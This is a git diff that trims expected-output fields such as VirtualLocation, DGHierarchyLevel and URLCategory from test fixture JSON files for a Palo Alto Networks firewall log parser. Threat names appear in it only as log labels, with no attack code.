@@ -61,9 +61,6 @@ "vendor": "Palo Alto Networks", "version": "2.0" }, - "paloalto": { - "VirtualLocation": "vsys1" - }, "related": { "ip": [ "1.1.1.1" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json index 2da36f33e..965583ed3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json @@ -65,10 +65,6 @@ }, "paloalto": { "DirectionOfAttack": "client to server", - "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", - "PanOSSourceLocation": "1.1.1.1-1.1.1.1", - "URLCategory": "any", - "VirtualLocation": "smtp", "endpoint": { "serial_number": "xxxxxxxxxxxxxx" } diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json index 512ae89e7..4dadbb51b 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json @@ -52,8 +52,7 @@ "serial_number": "001701003551" }, "paloalto": { - "Threat_ContentType": "end", - "VirtualLocation": "vsys1" + "Threat_ContentType": "end" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json index add589697..4863396f8 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json @@ -52,8 +52,7 @@ "serial_number": "001701003551" }, "paloalto": { - "Threat_ContentType": "end", - "VirtualLocation": "vsys1" + "Threat_ContentType": "end" }, "related": { "ip": [ diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json index 4fd7b8802..09505692f 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json 
@@ -42,7 +42,6 @@
 "version": "2.0"
 },
 "paloalto": {
- "PanOSQuarantineReason": "Malicious Traffic",
 "authentication": {
 "method": "RADIUS"
 },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..0c72fdb63 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
@@ -34,9 +34,7 @@
 "serial_number": "ABCDEFG"
 },
 "paloalto": {
- "EventID": "gw-auth",
 "Threat_ContentType": "0",
- "VirtualLocation": "vsys1",
 "connection": {
 "stage": "login"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..2f8cb93ae 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
@@ -34,9 +34,7 @@
 "serial_number": "DFN3535D"
 },
 "paloalto": {
- "EventID": "gateway-config-release",
 "Threat_ContentType": "0",
- "VirtualLocation": "vsys1",
 "connection": {
 "stage": "configuration"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
index 6a0a99b82..966ea0b88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
@@ -40,9 +40,6 @@
 "version": "2.0"
 },
 "paloalto": {
- "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
- "VirtualLocation": "vsys1",
- "VirtualSystemID": "1",
 "endpoint": {
 "serial_number": "xxxxxxxxxxxxxx"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
index e4e153224..6e8e88e79 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
@@ -49,8 +49,7 @@
 "serial_number": "1801017000"
 },
 "paloalto": {
- "Threat_ContentType": "start",
- "VirtualLocation": "vsys"
+ "Threat_ContentType": "start"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
index 9d2db872a..4eef50d9d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
@@ -39,10 +39,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "VirtualLocation": "vsys1",
- "VirtualSystemID": "1"
- },
 "related": {
 "hosts": [
 "PA-VM"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
index d14918dab..a6c93b2c4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
@@ -58,14 +58,8 @@
 "serial_number": "000011111112222"
 },
 "paloalto": {
- "DGHierarchyLevel1": "982",
- "DGHierarchyLevel2": "117",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
- "Threat_ContentType": "url",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "url"
 },
 "related": {
 "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..6fd2dbfa0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
@@ -63,15 +63,8 @@
 "serial_number": "no-serial"
 },
 "paloalto": {
- "ContentType": "text/plain",
- "DGHierarchyLevel1": "463",
- "DGHierarchyLevel2": "525",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
- "Threat_ContentType": "url",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "url"
 },
 "related": {
 "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
index 717e963a0..ff9edc877 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
@@ -57,10 +57,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "PanOSSourceLocation": "US",
- "VirtualLocation": "vsys1"
- },
 "related": {
 "hosts": [
 "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index 3e52f494c..ab8aae097 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
@@ -30,11 +30,6 @@
 "serial_number": "11111114444"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "auth-success",
 "Threat_ContentType": "auth"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
index eb10d6148..49c1758ab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
@@ -49,8 +49,7 @@
 "serial_number": "1801016000"
 },
 "paloalto": {
- "Threat_ContentType": "start",
- "VirtualLocation": "vsys1234"
+ "Threat_ContentType": "start"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
index 3af5d5428..c4c2b4c70 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url-filtering"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
index 5e1cc96a9..17ae8dd31 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "dhcp"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
index f4541dcbf..72af37535 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "dnsproxy"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index 3142ed671..ee2f64323 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
@@ -60,14 +60,8 @@
 "serial_number": "no-serial"
 },
 "paloalto": {
- "DGHierarchyLevel1": "463",
- "DGHierarchyLevel2": "467",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "server to client",
- "Threat_ContentType": "file",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "file"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index f08a677ef..aa4388311 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
@@ -37,9 +37,7 @@
 "serial_number": "PF000000"
 },
 "paloalto": {
- "EventID": "gateway-switch-to-ssl",
 "Threat_ContentType": "0",
- "VirtualLocation": "vsys1",
 "connection": {
 "stage": "tunnel"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
index bbf2d4e97..ed54db08a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
@@ -33,10 +33,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index f569f8246..6ba2ed95f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
@@ -51,16 +51,10 @@
 "serial_number": "012001002253"
 },
 "paloalto": {
- "DGHierarchyLevel1": "24",
- "DGHierarchyLevel2": "315",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys1",
 "threat": {
 "id": "40005",
- "name": "LDAP: User Login Brute Force Attempt",
- "type": "vulnerability exploit detection"
+ "name": "LDAP: User Login Brute Force Attempt"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
index 610ab7c24..f5f961342 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
@@ -73,14 +73,8 @@
 "serial_number": "007954000XXXXXX"
 },
 "paloalto": {
- "DGHierarchyLevel1": "999",
- "DGHierarchyLevel2": "1111",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "server to client",
- "Threat_ContentType": "file",
- "URLCategory": "business-and-economy",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "file"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 25db7ff0a..501fb4be5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
@@ -38,12 +38,7 @@
 "version": "0.0.-1"
 },
 "paloalto": {
- "DGHierarchyLevel1": "556",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "globalprotect",
- "VirtualSystemID": "1",
 "connection": {
 "stage": "logout"
 },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
index c3d742b70..80edd7cf5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
@@ -62,13 +62,8 @@
 "serial_number": "007954000370000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "997",
- "DGHierarchyLevel2": "1169",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys1",
 "threat": {
 "category": "brute-force",
 "id": "SSH User Authentication Brute Force Attempt(40015)"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
index b4a75c57c..6a5a4358f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
@@ -64,14 +64,8 @@
 "serial_number": "00795400037XXXX"
 },
 "paloalto": {
- "DGHierarchyLevel1": "997",
- "DGHierarchyLevel2": "1169",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
- "Threat_ContentType": "url",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "url"
 },
 "related": {
 "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
index a470b3176..1ad423127 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
@@ -32,10 +32,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "ntpd"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
index af31efa35..ed9754708 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
@@ -36,10 +36,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "port"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
index c9ebd467e..76aeaa4ce 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
@@ -36,10 +36,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "fb"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
index 2d21571e0..c773195d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
@@ -30,11 +30,6 @@
 "serial_number": "016201000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "test-event",
 "Threat_ContentType": "vpn"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
index 8a299b691..70c358caf 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
@@ -34,10 +34,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
index 4b7dc612f..b481b6c39 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url-filtering"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
index 7901b05ce..989c8393e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "dhcp"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
index 30a9a9970..a92e1d91b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
@@ -33,10 +33,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
index f74ff5a47..c546509c6 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
index 8c122fc65..452b9d6bb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
index 524aef010..4b2a51b0f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
index f305c2d3e..36807c11d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
index 63f3bd258..a83bce94f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
index a00e82987..548954584 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
@@ -32,10 +32,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
index 9cb10263a..cd41f06d0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
@@ -33,10 +33,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
index 2aa5ce29e..2130588d1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
@@ -30,10 +30,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index 51579bdcb..db55cc61a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
@@ -47,15 +47,9 @@
 "serial_number": "016201000000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url",
- "VirtualLocation": "vsys1",
 "threat": {
- "id": "9999",
- "type": "URL filtering log"
+ "id": "9999"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index eadb40265..196fc9c0c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
@@ -57,16 +57,10 @@
 "serial_number": "012345678910"
 },
 "paloalto": {
- "DGHierarchyLevel1": "320",
- "DGHierarchyLevel2": "90",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys1",
 "threat": {
 "id": "95187",
- "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
- "type": "custom threat"
+ "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
index d2e4e4775..bc3ccb698 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
@@ -30,11 +30,6 @@
 "serial_number": "026701002348"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "general",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
index c0f834538..cc477a27e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
@@ -59,13 +59,7 @@
 "serial_number": "007954000351998"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "Threat_ContentType": "end",
- "URLCategory": "any",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
index cfa92faf3..72bc384fb 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
@@ -59,13 +59,7 @@
 "serial_number": "007954000351998"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "Threat_ContentType": "end",
- "URLCategory": "any",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
